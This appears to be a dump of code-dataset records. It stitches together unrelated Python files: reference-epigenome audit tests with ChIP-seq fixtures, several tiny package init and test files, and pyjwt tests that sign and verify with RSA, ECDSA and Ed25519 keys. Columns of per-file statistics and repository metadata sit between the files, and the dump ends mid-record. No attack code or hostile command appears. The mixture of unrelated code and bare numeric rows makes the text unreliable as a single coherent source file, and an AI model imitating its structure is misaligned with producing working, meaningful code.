@pytest.fixture
def reference_experiment_chip_seq_H3K4me3(testapp, lab, award, target_H3K4me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me3['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27ac(testapp, lab, award, target_H3K27ac, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27ac['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K9me3(testapp, lab, award, target_H3K9me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K9me3['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def target_control(testapp, organism):
item = {
'label': 'Control',
'target_organism': organism['@id'],
'investigated_as': ['control']
}
return testapp.post_json('/target', item).json['@graph'][0]
@pytest.fixture
def target_H3K27me3(testapp, organism):
item = {
'label': 'H3K27me3',
'target_organism': organism['@id'],
'investigated_as': ['histone']
}
return testapp.post_json('/target', item).json['@graph'][0]
@pytest.fixture
def target_H3K36me3(testapp, organism):
item = {
'label': 'H3K36me3',
'target_organism': organism['@id'],
'investigated_as': ['histone']
}
return testapp.post_json('/target', item).json['@graph'][0]
@pytest.fixture
def target_H3K4me1(testapp, organism):
item = {
'label': 'H3K4me1',
'target_organism': organism['@id'],
'investigated_as': ['histone']
}
return testapp.post_json('/target', item).json['@graph'][0]
@pytest.fixture
def target_H3K4me3(testapp, organism):
item = {
'label': 'H3K4me3',
'target_organism': organism['@id'],
'investigated_as': ['histone']
}
return testapp.post_json('/target', item).json['@graph'][0]
@pytest.fixture
def target_H3K27ac(testapp, organism):
item = {
'label': 'H3K27ac',
'target_organism': organism['@id'],
'investigated_as': ['histone']
}
return testapp.post_json('/target', item).json['@graph'][0]
@pytest.fixture
def target_H3K9me3(testapp, organism):
item = {
'label': 'H3K9me3',
'target_organism': organism['@id'],
'investigated_as': ['histone']
}
return testapp.post_json('/target', item).json['@graph'][0]
def test_reference_epigenome_without_required_assays(testapp, reference_epigenome_1):
res = testapp.get(reference_epigenome_1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert any(error['category'] == 'partial reference epigenome' for error in errors_list)
@pytest.fixture
def replicate_RNA_seq(testapp, reference_experiment_RNA_seq, library_1):
item = {
'experiment': reference_experiment_RNA_seq['@id'],
'library': library_1['@id'],
'biological_replicate_number': 1,
'technical_replicate_number': 1,
}
return testapp.post_json('/replicate', item).json['@graph'][0]
@pytest.fixture
def replicate_RRBS(testapp, reference_experiment_RRBS, library_2):
item = {
'experiment': reference_experiment_RRBS['@id'],
'library': library_2['@id'],
'biological_replicate_number': 1,
'technical_replicate_number': 1,
}
return testapp.post_json('/replicate', item).json['@graph'][0]
def test_reference_epigenome_with_required_assays(testapp, reference_epigenome_1,
reference_experiment_RNA_seq,
reference_experiment_RRBS,
reference_experiment_WGBS,
reference_experiment_chip_seq_control,
reference_experiment_chip_seq_H3K27me3,
reference_experiment_chip_seq_H3K36me3,
reference_experiment_chip_seq_H3K4me1,
reference_experiment_chip_seq_H3K4me3,
reference_experiment_chip_seq_H3K27ac,
reference_experiment_chip_seq_H3K9me3,
):
testapp.patch_json(reference_epigenome_1['@id'], {'related_datasets':
[reference_experiment_RNA_seq['@id'],
reference_experiment_RRBS['@id'],
reference_experiment_WGBS['@id'],
reference_experiment_chip_seq_control['@id'],
reference_experiment_chip_seq_H3K27me3[
'@id'],
reference_experiment_chip_seq_H3K36me3[
'@id'],
reference_experiment_chip_seq_H3K4me1['@id'],
reference_experiment_chip_seq_H3K4me3['@id'],
reference_experiment_chip_seq_H3K27ac['@id'],
reference_experiment_chip_seq_H3K9me3['@id']
]})
testapp.patch_json(reference_experiment_RNA_seq['@id'], {'status': 'in progress'})
res = testapp.get(reference_epigenome_1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert any(error['category'] == 'partial reference epigenome' for error in errors_list)
testapp.patch_json(reference_experiment_RNA_seq['@id'], {'status': 'released'})
res = testapp.get(reference_epigenome_1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert all(error['category'] != 'partial reference epigenome' for error in errors_list)
def test_reference_epigenome_multiple_biosample_term_names(testapp, reference_epigenome_1,
reference_experiment_RNA_seq,
reference_experiment_RRBS,
replicate_RNA_seq,
replicate_RRBS,
library_1,
library_2,
biosample_1,
biosample_2,
donor_1,
donor_2,
liver,
heart):
testapp.patch_json(biosample_1['@id'], {'donor': donor_1['@id'],
'biosample_ontology': liver['uuid']})
testapp.patch_json(biosample_2['@id'], {'donor': donor_2['@id'],
'biosample_ontology': heart['uuid']})
testapp.patch_json(library_1['@id'], {'biosample': biosample_1['@id']})
testapp.patch_json(library_2['@id'], {'biosample': biosample_2['@id']})
testapp.patch_json(reference_epigenome_1['@id'], {'related_datasets':
[reference_experiment_RNA_seq['@id'],
reference_experiment_RRBS['@id']]})
res = testapp.get(reference_epigenome_1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert any(error['category'] == 'multiple biosample term names in reference epigenome' for
error in errors_list)
def test_reference_epigenome_multiple_biosample_treatments(testapp, reference_epigenome_1,
reference_experiment_RNA_seq,
reference_experiment_RRBS,
replicate_RNA_seq,
replicate_RRBS,
treatment,
library_1,
library_2,
biosample_1,
biosample_2):
testapp.patch_json(biosample_1['@id'], {'treatments': [treatment['@id']]})
testapp.patch_json(library_1['@id'], {'biosample': biosample_1['@id']})
testapp.patch_json(library_2['@id'], {'biosample': biosample_2['@id']})
testapp.patch_json(reference_epigenome_1['@id'], {'related_datasets':
[reference_experiment_RNA_seq['@id'],
reference_experiment_RRBS['@id']]})
res = testapp.get(reference_epigenome_1['@id'] + '@@index-data')
errors = res.json['audit']
errors_list = []
for error_type in errors:
errors_list.extend(errors[error_type])
assert any(error['category'] == 'multiple biosample treatments in reference epigenome' for
error in errors_list)
| 40.235142
| 100
| 0.541198
| 1,450
| 15,571
| 5.528966
| 0.068966
| 0.104278
| 0.060247
| 0.068105
| 0.852563
| 0.787452
| 0.763128
| 0.759885
| 0.729575
| 0.716852
| 0
| 0.035807
| 0.329202
| 15,571
| 386
| 101
| 40.339378
| 0.731738
| 0
| 0
| 0.676829
| 0
| 0
| 0.226832
| 0.022863
| 0
| 0
| 0
| 0
| 0.015244
| 1
| 0.073171
| false
| 0
| 0.003049
| 0
| 0.137195
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
684fd931660a2c9bf35be0acf6b1ef0563e40de1
| 37
|
py
|
Python
|
densenet/__init__.py
|
cr3ux53c/DenseNet-Tensorflow2
|
208143bf4086c407e524e01cd945fd3b0741b48d
|
[
"MIT"
] | 15
|
2019-06-04T20:49:37.000Z
|
2022-03-03T03:03:00.000Z
|
densenet/__init__.py
|
cr3ux53c/DenseNet-Tensorflow2
|
208143bf4086c407e524e01cd945fd3b0741b48d
|
[
"MIT"
] | null | null | null |
densenet/__init__.py
|
cr3ux53c/DenseNet-Tensorflow2
|
208143bf4086c407e524e01cd945fd3b0741b48d
|
[
"MIT"
] | 9
|
2020-02-09T16:01:10.000Z
|
2022-01-24T19:14:37.000Z
|
from .densenet import densenet_model
| 18.5
| 36
| 0.864865
| 5
| 37
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
685980a392657e59e028ee8df4fcea56ae6b18f2
| 318
|
py
|
Python
|
duty/__init__.py
|
ximetov/IrCa-Duty
|
666c2d26c9cd7d314798cfb222ad91dfeee4a5b6
|
[
"MIT"
] | 6
|
2020-05-18T21:53:27.000Z
|
2020-07-06T12:48:00.000Z
|
duty/__init__.py
|
ximetov/IrCa-Duty
|
666c2d26c9cd7d314798cfb222ad91dfeee4a5b6
|
[
"MIT"
] | null | null | null |
duty/__init__.py
|
ximetov/IrCa-Duty
|
666c2d26c9cd7d314798cfb222ad91dfeee4a5b6
|
[
"MIT"
] | 6
|
2020-05-13T16:16:15.000Z
|
2020-06-23T12:05:09.000Z
|
from os.path import join, dirname
from .app import app
from duty.objects import __version__
from .iris_listener import __name__
from .icad_listener import __name__
from .longpoll_listener import __name__
from .my_signals import __name__
from .callback_signals import __name__
from .longpoll_signals import __name__
| 24.461538
| 39
| 0.842767
| 45
| 318
| 5.2
| 0.4
| 0.25641
| 0.299145
| 0.282051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125786
| 318
| 12
| 40
| 26.5
| 0.841727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
685a6050758b81a002467be41c25bf7019789ba8
| 145
|
py
|
Python
|
Round A Kick Start 2018/Even Digits (8pts, 15pts)/code/test_findX.py
|
wangyuxiang0829/Google-Kick-Start
|
13146d7887ea72e1c98a49b754b36640668174c4
|
[
"MIT"
] | null | null | null |
Round A Kick Start 2018/Even Digits (8pts, 15pts)/code/test_findX.py
|
wangyuxiang0829/Google-Kick-Start
|
13146d7887ea72e1c98a49b754b36640668174c4
|
[
"MIT"
] | null | null | null |
Round A Kick Start 2018/Even Digits (8pts, 15pts)/code/test_findX.py
|
wangyuxiang0829/Google-Kick-Start
|
13146d7887ea72e1c98a49b754b36640668174c4
|
[
"MIT"
] | null | null | null |
import answer
def test_findX():
assert answer.findX(23522) == 22888
assert answer.findX(13000) == 8888
assert answer.findX(2) == 2
| 18.125
| 39
| 0.668966
| 20
| 145
| 4.8
| 0.55
| 0.375
| 0.53125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182609
| 0.206897
| 145
| 7
| 40
| 20.714286
| 0.652174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
686875aa29e7d8ea5641f45a77b1151c0013ad38
| 25
|
py
|
Python
|
sana_pchr/forms/admin/__init__.py
|
SanaMobile/sana.pchr.oss-web
|
2b2fd75a1730f1743e28b4499bb1ba76fa100970
|
[
"BSD-3-Clause"
] | null | null | null |
sana_pchr/forms/admin/__init__.py
|
SanaMobile/sana.pchr.oss-web
|
2b2fd75a1730f1743e28b4499bb1ba76fa100970
|
[
"BSD-3-Clause"
] | null | null | null |
sana_pchr/forms/admin/__init__.py
|
SanaMobile/sana.pchr.oss-web
|
2b2fd75a1730f1743e28b4499bb1ba76fa100970
|
[
"BSD-3-Clause"
] | 2
|
2018-06-07T21:54:08.000Z
|
2018-07-11T20:40:19.000Z
|
from .physician import *
| 12.5
| 24
| 0.76
| 3
| 25
| 6.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d7fba856b779338179132c8a8f4e93af3b23ec19
| 115
|
py
|
Python
|
tests/__init__.py
|
PtitCaius/taskwiki
|
8c4da3a744fd1aa22bfb0369658cecc925e77fd0
|
[
"MIT"
] | 465
|
2015-03-27T09:42:18.000Z
|
2020-07-18T20:35:19.000Z
|
tests/__init__.py
|
PtitCaius/taskwiki
|
8c4da3a744fd1aa22bfb0369658cecc925e77fd0
|
[
"MIT"
] | 272
|
2015-01-10T20:38:02.000Z
|
2020-07-16T12:55:15.000Z
|
tests/__init__.py
|
PtitCaius/taskwiki
|
8c4da3a744fd1aa22bfb0369658cecc925e77fd0
|
[
"MIT"
] | 66
|
2015-03-21T16:33:39.000Z
|
2020-07-12T09:20:29.000Z
|
import os
import sys
path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(0, path)
| 19.166667
| 67
| 0.756522
| 20
| 115
| 4.15
| 0.45
| 0.216867
| 0.313253
| 0.361446
| 0.385542
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009524
| 0.086957
| 115
| 5
| 68
| 23
| 0.780952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0bdd64b10c28bc415cc476b1a6964d9232be1916
| 152
|
py
|
Python
|
cacreader/swig-4.0.2/Examples/test-suite/python/keyword_rename_runme.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | 1,031
|
2015-01-02T14:08:47.000Z
|
2022-03-29T02:25:27.000Z
|
cacreader/swig-4.0.2/Examples/test-suite/python/keyword_rename_runme.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | 240
|
2015-01-11T04:27:19.000Z
|
2022-03-30T00:35:57.000Z
|
cacreader/swig-4.0.2/Examples/test-suite/python/keyword_rename_runme.py
|
kyletanyag/LL-Smartcard
|
02abea9de5a13f8bae4d7832ab34cb7f0d9514c9
|
[
"BSD-3-Clause"
] | 224
|
2015-01-05T06:13:54.000Z
|
2022-02-25T14:39:51.000Z
|
#!/usr/bin/env python
import keyword_rename
keyword_rename._in(1)
keyword_rename._in(_except=1)
keyword_rename._except(1)
keyword_rename._except(_in=1)
| 21.714286
| 29
| 0.822368
| 25
| 152
| 4.56
| 0.4
| 0.570175
| 0.368421
| 0.350877
| 0.403509
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.052632
| 152
| 6
| 30
| 25.333333
| 0.763889
| 0.131579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
04231e87c099348d8119eb313bea9caff1f09251
| 82
|
py
|
Python
|
tests/asp/gringo/modelchecker.016.test.py
|
bernardocuteri/wasp
|
05c8f961776dbdbf7afbf905ee00fc262eba51ad
|
[
"Apache-2.0"
] | 19
|
2015-12-03T08:53:45.000Z
|
2022-03-31T02:09:43.000Z
|
tests/asp/gringo/modelchecker.016.test.py
|
bernardocuteri/wasp
|
05c8f961776dbdbf7afbf905ee00fc262eba51ad
|
[
"Apache-2.0"
] | 80
|
2017-11-25T07:57:32.000Z
|
2018-06-10T19:03:30.000Z
|
tests/asp/gringo/modelchecker.016.test.py
|
bernardocuteri/wasp
|
05c8f961776dbdbf7afbf905ee00fc262eba51ad
|
[
"Apache-2.0"
] | 6
|
2015-01-15T07:51:48.000Z
|
2020-06-18T14:47:48.000Z
|
input = """
c | d.
a | b :- c.
a :- b.
b :- a.
"""
output = """
{d}
{c, a, b}
"""
| 7.454545
| 12
| 0.292683
| 15
| 82
| 1.6
| 0.4
| 0.25
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.317073
| 82
| 10
| 13
| 8.2
| 0.428571
| 0
| 0
| 0.2
| 0
| 0
| 0.621951
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f0cf39429c93e9e2b16ab221fc081d560b484e4c
| 10,512
|
py
|
Python
|
tests/contrib/test_algorithms.py
|
GeoffRichards/pyjwt
|
ec17f67c54d2d6c91def8ced366a88a8c797b110
|
[
"MIT"
] | null | null | null |
tests/contrib/test_algorithms.py
|
GeoffRichards/pyjwt
|
ec17f67c54d2d6c91def8ced366a88a8c797b110
|
[
"MIT"
] | null | null | null |
tests/contrib/test_algorithms.py
|
GeoffRichards/pyjwt
|
ec17f67c54d2d6c91def8ced366a88a8c797b110
|
[
"MIT"
] | null | null | null |
import base64
import pytest
from jwt.utils import force_bytes, force_unicode
from ..utils import key_path
try:
from jwt.contrib.algorithms.pycrypto import RSAAlgorithm
has_pycrypto = True
except ImportError:
has_pycrypto = False
try:
from jwt.contrib.algorithms.py_ecdsa import ECAlgorithm
has_ecdsa = True
except ImportError:
has_ecdsa = False
try:
from jwt.contrib.algorithms.py_ed25519 import Ed25519Algorithm
has_ed25519 = True
except ImportError:
has_ed25519 = False
@pytest.mark.skipif(
not has_pycrypto, reason="Not supported without PyCrypto library"
)
class TestPycryptoAlgorithms:
def test_rsa_should_parse_pem_public_key(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with open(key_path("testkey2_rsa.pub.pem")) as pem_key:
algo.prepare_key(pem_key.read())
def test_rsa_should_accept_unicode_key(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with open(key_path("testkey_rsa")) as rsa_key:
algo.prepare_key(force_unicode(rsa_key.read()))
def test_rsa_should_reject_non_string_key(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with pytest.raises(TypeError):
algo.prepare_key(None)
def test_rsa_sign_should_generate_correct_signature_value(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
jwt_message = force_bytes("Hello World!")
expected_sig = base64.b64decode(
force_bytes(
"yS6zk9DBkuGTtcBzLUzSpo9gGJxJFOGvUqN01iLhWHrzBQ9ZEz3+Ae38AXp"
"10RWwscp42ySC85Z6zoN67yGkLNWnfmCZSEv+xqELGEvBJvciOKsrhiObUl"
"2mveSc1oeO/2ujkGDkkkJ2epn0YliacVjZF5+/uDmImUfAAj8lzjnHlzYix"
"sn5jGz1H07jYYbi9diixN8IUhXeTafwFg02IcONhum29V40Wu6O5tAKWlJX"
"fHJnNUzAEUOXS0WahHVb57D30pcgIji9z923q90p5c7E2cU8V+E1qe8NdCA"
"APCDzZZ9zQ/dgcMVaBrGrgimrcLbPjueOKFgSO+SSjIElKA=="
)
)
with open(key_path("testkey_rsa")) as keyfile:
jwt_key = algo.prepare_key(keyfile.read())
with open(key_path("testkey_rsa.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
algo.sign(jwt_message, jwt_key)
result = algo.verify(jwt_message, jwt_pub_key, expected_sig)
assert result
def test_rsa_verify_should_return_false_if_signature_invalid(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
jwt_message = force_bytes("Hello World!")
jwt_sig = base64.b64decode(
force_bytes(
"yS6zk9DBkuGTtcBzLUzSpo9gGJxJFOGvUqN01iLhWHrzBQ9ZEz3+Ae38AXp"
"10RWwscp42ySC85Z6zoN67yGkLNWnfmCZSEv+xqELGEvBJvciOKsrhiObUl"
"2mveSc1oeO/2ujkGDkkkJ2epn0YliacVjZF5+/uDmImUfAAj8lzjnHlzYix"
"sn5jGz1H07jYYbi9diixN8IUhXeTafwFg02IcONhum29V40Wu6O5tAKWlJX"
"fHJnNUzAEUOXS0WahHVb57D30pcgIji9z923q90p5c7E2cU8V+E1qe8NdCA"
"APCDzZZ9zQ/dgcMVaBrGrgimrcLbPjueOKFgSO+SSjIElKA=="
)
)
jwt_sig += force_bytes("123") # Signature is now invalid
with open(key_path("testkey_rsa.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
assert not result
def test_rsa_verify_should_return_true_if_signature_valid(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
jwt_message = force_bytes("Hello World!")
jwt_sig = base64.b64decode(
force_bytes(
"yS6zk9DBkuGTtcBzLUzSpo9gGJxJFOGvUqN01iLhWHrzBQ9ZEz3+Ae38AXp"
"10RWwscp42ySC85Z6zoN67yGkLNWnfmCZSEv+xqELGEvBJvciOKsrhiObUl"
"2mveSc1oeO/2ujkGDkkkJ2epn0YliacVjZF5+/uDmImUfAAj8lzjnHlzYix"
"sn5jGz1H07jYYbi9diixN8IUhXeTafwFg02IcONhum29V40Wu6O5tAKWlJX"
"fHJnNUzAEUOXS0WahHVb57D30pcgIji9z923q90p5c7E2cU8V+E1qe8NdCA"
"APCDzZZ9zQ/dgcMVaBrGrgimrcLbPjueOKFgSO+SSjIElKA=="
)
)
with open(key_path("testkey_rsa.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
assert result
def test_rsa_prepare_key_should_be_idempotent(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with open(key_path("testkey_rsa.pub")) as keyfile:
jwt_pub_key_first = algo.prepare_key(keyfile.read())
jwt_pub_key_second = algo.prepare_key(jwt_pub_key_first)
assert jwt_pub_key_first == jwt_pub_key_second
@pytest.mark.skipif(
not has_ecdsa, reason="Not supported without ecdsa library"
)
class TestEcdsaAlgorithms:
def test_ec_should_reject_non_string_key(self):
algo = ECAlgorithm(ECAlgorithm.SHA256)
with pytest.raises(TypeError):
algo.prepare_key(None)
def test_ec_should_accept_unicode_key(self):
algo = ECAlgorithm(ECAlgorithm.SHA256)
with open(key_path("testkey_ec")) as ec_key:
algo.prepare_key(force_unicode(ec_key.read()))
def test_ec_sign_should_generate_correct_signature_value(self):
algo = ECAlgorithm(ECAlgorithm.SHA256)
jwt_message = force_bytes("Hello World!")
expected_sig = base64.b64decode(
force_bytes(
"AC+m4Jf/xI3guAC6w0w37t5zRpSCF6F4udEz5LiMiTIjCS4vcVe6dDOxK+M"
"mvkF8PxJuvqxP2CO3TR3okDPCl/NjATTO1jE+qBZ966CRQSSzcCM+tzcHzw"
"LZS5kbvKu0Acd/K6Ol2/W3B1NeV5F/gjvZn/jOwaLgWEUYsg0o4XVrAg65"
)
)
with open(key_path("testkey_ec")) as keyfile:
jwt_key = algo.prepare_key(keyfile.read())
with open(key_path("testkey_ec.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
algo.sign(jwt_message, jwt_key)
result = algo.verify(jwt_message, jwt_pub_key, expected_sig)
assert result
def test_ec_verify_should_return_false_if_signature_invalid(self):
algo = ECAlgorithm(ECAlgorithm.SHA256)
jwt_message = force_bytes("Hello World!")
jwt_sig = base64.b64decode(
force_bytes(
"AC+m4Jf/xI3guAC6w0w37t5zRpSCF6F4udEz5LiMiTIjCS4vcVe6dDOxK+M"
"mvkF8PxJuvqxP2CO3TR3okDPCl/NjATTO1jE+qBZ966CRQSSzcCM+tzcHzw"
"LZS5kbvKu0Acd/K6Ol2/W3B1NeV5F/gjvZn/jOwaLgWEUYsg0o4XVrAg65"
)
)
jwt_sig += force_bytes("123") # Signature is now invalid
with open(key_path("testkey_ec.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
assert not result
def test_ec_verify_should_return_true_if_signature_valid(self):
algo = ECAlgorithm(ECAlgorithm.SHA256)
jwt_message = force_bytes("Hello World!")
jwt_sig = base64.b64decode(
force_bytes(
"AC+m4Jf/xI3guAC6w0w37t5zRpSCF6F4udEz5LiMiTIjCS4vcVe6dDOxK+M"
"mvkF8PxJuvqxP2CO3TR3okDPCl/NjATTO1jE+qBZ966CRQSSzcCM+tzcHzw"
"LZS5kbvKu0Acd/K6Ol2/W3B1NeV5F/gjvZn/jOwaLgWEUYsg0o4XVrAg65"
)
)
with open(key_path("testkey_ec.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
assert result
def test_ec_prepare_key_should_be_idempotent(self):
algo = ECAlgorithm(ECAlgorithm.SHA256)
with open(key_path("testkey_ec.pub")) as keyfile:
jwt_pub_key_first = algo.prepare_key(keyfile.read())
jwt_pub_key_second = algo.prepare_key(jwt_pub_key_first)
assert jwt_pub_key_first == jwt_pub_key_second
@pytest.mark.skipif(
not has_ed25519, reason="Not supported without cryptography>=2.6 library"
)
class TestEd25519Algorithms:
hello_world_sig = "Qxa47mk/azzUgmY2StAOguAd4P7YBLpyCfU3JdbaiWnXM4o4WibXwmIHvNYgN3frtE2fcyd8OYEaOiD/KiwkCg=="
hello_world = force_bytes("Hello World!")
def test_ed25519_should_reject_non_string_key(self):
algo = Ed25519Algorithm()
with pytest.raises(TypeError):
algo.prepare_key(None)
with open(key_path("testkey_ed25519")) as keyfile:
algo.prepare_key(keyfile.read())
with open(key_path("testkey_ed25519.pub")) as keyfile:
algo.prepare_key(keyfile.read())
def test_ed25519_should_accept_unicode_key(self):
algo = Ed25519Algorithm()
with open(key_path("testkey_ed25519")) as ec_key:
algo.prepare_key(force_unicode(ec_key.read()))
def test_ed25519_sign_should_generate_correct_signature_value(self):
algo = Ed25519Algorithm()
jwt_message = self.hello_world
expected_sig = base64.b64decode(force_bytes(self.hello_world_sig))
with open(key_path("testkey_ed25519")) as keyfile:
jwt_key = algo.prepare_key(keyfile.read())
with open(key_path("testkey_ed25519.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
algo.sign(jwt_message, jwt_key)
result = algo.verify(jwt_message, jwt_pub_key, expected_sig)
assert result
def test_ed25519_verify_should_return_false_if_signature_invalid(self):
algo = Ed25519Algorithm()
jwt_message = self.hello_world
jwt_sig = base64.b64decode(force_bytes(self.hello_world_sig))
jwt_sig += force_bytes("123") # Signature is now invalid
with open(key_path("testkey_ed25519.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
assert not result
def test_ed25519_verify_should_return_true_if_signature_valid(self):
algo = Ed25519Algorithm()
jwt_message = self.hello_world
jwt_sig = base64.b64decode(force_bytes(self.hello_world_sig))
with open(key_path("testkey_ed25519.pub")) as keyfile:
jwt_pub_key = algo.prepare_key(keyfile.read())
result = algo.verify(jwt_message, jwt_pub_key, jwt_sig)
assert result
def test_ed25519_prepare_key_should_be_idempotent(self):
algo = Ed25519Algorithm()
with open(key_path("testkey_ed25519.pub")) as keyfile:
jwt_pub_key_first = algo.prepare_key(keyfile.read())
jwt_pub_key_second = algo.prepare_key(jwt_pub_key_first)
assert jwt_pub_key_first == jwt_pub_key_second
| 35.04
| 112
| 0.688642
| 1,152
| 10,512
| 5.953993
| 0.105035
| 0.028867
| 0.043301
| 0.045925
| 0.888468
